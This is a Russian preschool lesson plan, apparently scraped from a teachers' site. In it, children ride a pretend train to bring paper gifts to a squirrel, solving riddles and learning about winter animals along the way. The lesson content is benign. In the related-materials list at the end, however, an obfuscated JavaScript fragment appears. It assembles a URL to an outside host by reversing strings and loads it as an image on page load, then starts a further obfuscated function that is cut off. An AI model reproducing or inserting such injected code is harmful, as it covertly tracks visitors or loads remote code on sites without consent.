Конспект образовательной деятельности в средней группе на тему: "Гостинцы для белочки"
план-конспект занятия по окружающему миру (средняя группа) по теме

Копылова Анна Анатольевна

Увлекательное занятие - путешествие к белочке в лес. Цель данного занятия - воспитывать у детей стремление прийти на помощь, любовь к природе и животным.

Скачать:

ВложениеРазмер
Microsoft Office document icon gostintsy_dlya_belochki.doc42.5 КБ

Предварительный просмотр:

МУНИЦИПАЛЬНОЕ БЮДЖЕТНОЕ

ДОШКОЛЬНОЕ ОБРАЗОВАТЕЛЬНОЕ УЧРЕЖДЕНИЕ –

ЦЕНТР РАЗВИТИЯ РЕБЕНКА – ДЕТСКИЙ САД № 9 «СВЕТЛЯЧОК»

Конспект

образовательной деятельности

в средней группе

на тему

«Гостинцы для белочки»

 «Гостинцы для белочки»

Цели: познакомить детей с зимним лесом; уточнять знания детей об обитании белочки; развивать внимание, мышление; воспитывать у детей стремление прийти на помощь, любовь к животным и природе.

Материал: костюмы Зайчика и Белочки; шлагбаум; таблички с названиями станций; картинки с изображением сверкающего снега; картинки с изображением следов животных; листок с лесными новостями; дерево из картона; веточки; грибочки и орехи из бумаги; морковка.

Предварительная работа: изготовление и раскрашивание грибочков и орехов из бумаги.

Ход работы:

Раздается стук в дверь. Входит Зайчик.

Зайчик: Здравствуйте, ребята! Я долго добирался из леса, пришел к вам за помощью. Хочу сообщить, что у белочки закончились запасы еды. Ей очень трудно. Ребята, вы можете помочь белочке?

Ответы детей.

Воспитатель: Ребята, а чем питается белочка?

Ответы детей.

Воспитатель: Правильно. Она питается лесными орехами, грибами, желудями. Еще летом белочка запасает на зиму корм и прячет его в кладовых. Ребята, как вы думаете, почему белочка делает запасы еды?

Ответы детей.

Воспитатель: Белочка заранее делает запасы еды, чтобы спокойно зимовать. Но Зайчик нам сообщил, что у белочки закончились запасы. Ребята, давайте поможем белочке и отвезем ей грибочки и орехи, которые мы с вами сделали. Вы согласны?

Ответы детей.

Воспитатель: Тогда предлагаю вам и Зайчику поехать к белочке в лес на нашем поезде «Юные помощники».

Воспитатель выстраивает ребят в поезд.

Воспитатель: Ту-ту! Наш поезд трогается, и мы с вами отправляемся в зимний лес. Ребята, лес — это дом для животных. В зимнее время года лес спит. Деревья, кустарники покрыты снегом. Посмотрите, как снег переливается на солнышке, сверкает разными огоньками.

Воспитатель обращает внимание детей на разложенные картинки с изображением сверкающего снега.

Воспитатель: Вот мы и подъехали к первой станции. Она называется «Загадкино». Чтобы наш поезд пропустили дальше, нам придется отгадать загадки. Попробуем ребята?

Ответы детей.

Воспитатель: Послушайте первую загадку.

Покружилась звездочка

В воздухе немножко,

Села и растаяла

На моей ладошке.

Ответы детей.

Воспитатель: Правильно, это снежинка. Послушайте следующую загадку.

Кто по елкам ловко скачет

И взлетает на дубы?

Кто в дупле орехи прячет,

Сушит на зиму грибы?

Ответы детей.

Воспитатель: Молодцы! Это белочка. Следующая загадка.

Хитрая плутовка,

Рыжая головка,

Хвост пушистый — краса!

А зовут ее …

Ответы детей.

Воспитатель: Правильно, это лиса. Послушайте еще загадку.

Богатырь в лесу растет.

Много лет он проживет.

Украшает лес родной

Он своею красотой.

Ответы детей.

Воспитатель: Молодцы, ребята! Это дуб. И последняя загадка.

Кто зимой холодной

Ходит хмурый и голодный.

Ответы детей.

Воспитатель: Правильно, это волк. Молодцы, ребята! Вы правильно отгадали все загадки. Шлагбаум открывается и мы с вами едем дальше. Посмотрите вокруг: на снегу много следов. Ребята, как вы думаете, чьи это следы?

Воспитатель обращает внимание детей на разложенные картинки с изображением следов животных.

Ответы детей.

Воспитатель: Это следы диких животных, которые живут в лесу. Ребята, каких диких животных вы знаете?

Ответы детей.

Воспитатель: Правильно. Ребята, по следу можно определить, какой зверь передвигался по лесу. Даже можно определить, в какую сторону он побежал. Следы — это значки на снегу. В лесу можно прочитать белую книгу зимы. Страницы у этой книги — снеговые и исписаны они значками. Чтобы прочитать белую книгу зимы, нужно внимательно рассматривать следы. Ребята, незаметно мы с вами подъехали ко второй станции. Называется она «Угадай-ка». Чтобы наш поезд смог поехать дальше, вы постарайтесь узнать по описанию диких животных. Попробуете отгадать?

Ответы детей.

Воспитатель: Послушайте ребята. Летом у этого зверька серенькая шубка. А с наступлением зимы меняет серенькую шубку на беленькую, чтобы его не заметили на снегу. От лютой стужи спасает пушистая, теплая шерсть. Питается он веточками деревьев, гложет кору. О каком животном идет речь?

Ответы детей.

Воспитатель: Правильно. Это заяц. А теперь послушайте про следующего животного. Он большой, лохматый. Летом любит малину, мед. К зиме накапливает жир. А всю зиму спит. Кто это?

Ответы детей.

Воспитатель: Правильно, ребята. Это медведь. Шлагбаум открылся, мы с вами отправляемся дальше. Ребята, а как зовут детенышей у белочки?

Ответы детей.

Воспитатель: Правильно. Детенышей у белочки зовут бельчата. Ребята, как вы думаете, бельчата обрадуются нашим гостинцам?

Ответы детей.

Воспитатель: Ребята, мы с вами подъехали к третьей станции. Называется она «Отдых». Вы немного устали, поэтому давайте отдохнем и проведем физкультминутку «Белочка».

Белка — рыжая краса,

Любит прыгать без конца.

Все грибочки собирает,

На зиму их запасает.

И бельчата помогают,

Маме-белке собирают:

Шишки, желуди, грибы -

Небывалой красоты!

Вот запасы хороши!

Будут рады малыши.

Зиму будут все встречать,

Прыгать, бегать и скакать.

Дети выполняют движения согласно текста.

Воспитатель: Ребята, мы с вами отдохнули, теперь отправляемся дальше. Следующая станция находится недалеко, мы подъезжаем к станции «Лесные новости». Интересно, какие последние новости в лесу? Сейчас узнаем.

Воспитатель берет листок с лесными новостями.

Воспитатель: Я вам прочитаю лесную новость: «Под деревьями много брошенных, обглоданных веточек. Это означает, что у белочки закончились запасы». Ребята, чтобы открылся шлагбаум, нам тоже следует сообщить свою новость. Какая у нас главная новость?

Ответы детей.

Воспитатель: Наша новость — мы везем гостинцы для белочки. Шлагбаум открывается, и мы с вами приближаемся к дереву, где живет белочка. Ребята, смотрите, около дерева сидит Белочка, а рядом разбросаны обглоданные веточки. Давайте с ней поздороваемся.

Дети и Белочка здороваются.

Воспитатель: Белочка, Зайчик рассказал ребятам, что у тебя закончились запасы еды. Они привезли тебе грибочки и орехи. Возьми их, пожалуйста. Ребята, давайте отдадим белочке наши гостинцы.

Дети отдают белочке гостинцы.

Белочка: Ребята, спасибо вам за ваши гостинцы! Мои бельчата обрадуются. Вы нам очень помогли.

Воспитатель: Ребята, давайте поблагодарим Зайчика, что он не остался равнодушным к беде Белочке и пришел к нам за помощью. У меня в пакетике лежит морковка, которую взяла с собой в путешествие. Давайте угостим Зайчика морковкой.

Дети говорят «спасибо» Зайчику. Отдают ему морковку.

Воспитатель: Ребята, вы все молодцы, что согласились помочь Белочке и привезли ей гостинцы. Давайте попрощаемся с Белочкой и Зайчиком. А нам пора отправляться обратно в путь.

Ребята прощаются с Белочкой и Зайчиком. Вместе с воспитателем возвращаются обратно в путь на поезде «Юные помощники».


По теме: методические разработки, презентации и конспекты

Конспект образовательной деятельности в средней группе с применением ЭОР образовательная область «Речевое развитие» тема занятия «Волшебный лес звуков"

Конспект образовательной деятельности в средней  группе с применением ЭОР тема занятия «Волшебный лес звуков"Конспект составлен воспитателем: Волковой Е.Ю.Задачи:Образовательная область: «Речевое...

Конспект образовательной деятельности в средней группе, развитие речи посредством театрализованной деятельности «Путешествие с Домовенком»

 Конспект  образовательной деятельности  в средней группе, развитие речи посредством театрализованной деятельности «Путешествие с Домовенком»Цель: Создание условий тв...

Конспект образовательной деятельности в средней группе, образовательная область «Социально-коммуникативное» Тема: «Путешествие в страну цветов» К коллективному просмотру в рамках дошкольного учреждения для студентов БПК

Добрый день! 26 апреля 2019г. Мной было проведино открытое занятие для студентов. Образовательная область "Социально-коммуникативное"на тему "Путешествие в страну цветов"...

Конспект образовательной деятельности в средней группе, развитие речи посредством театрализованной деятельности «Сказка – невеличка про зверей и рукавичку»

Конспект НОД по развитию речи в средней группе с элементами театрализации. Упражнения на развитие связной речи, ЗКР, грамматического строя речи, развитие коммуникативных умений....

Конспект образовательной деятельности в средней группе, развитие речи посредством театрализованной деятельности «Путешествие с Домовенком»

           -Организовать деятельность детей по развитию связной монологической и диалогической речи через театрализованную деятельность....

Конспект образовательной деятельности в средней группе, развитие речи посредством театрализованной деятельности «Путешествие с Домовенком»

           -Организовать деятельность детей по развитию связной монологической и диалогической речи через театрализованную деятельность....

Материалы для родителей "Учимся вместе". Конспект образовательной деятельности в средней группе "День рождения Белочки!"

\'use strict\';var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!...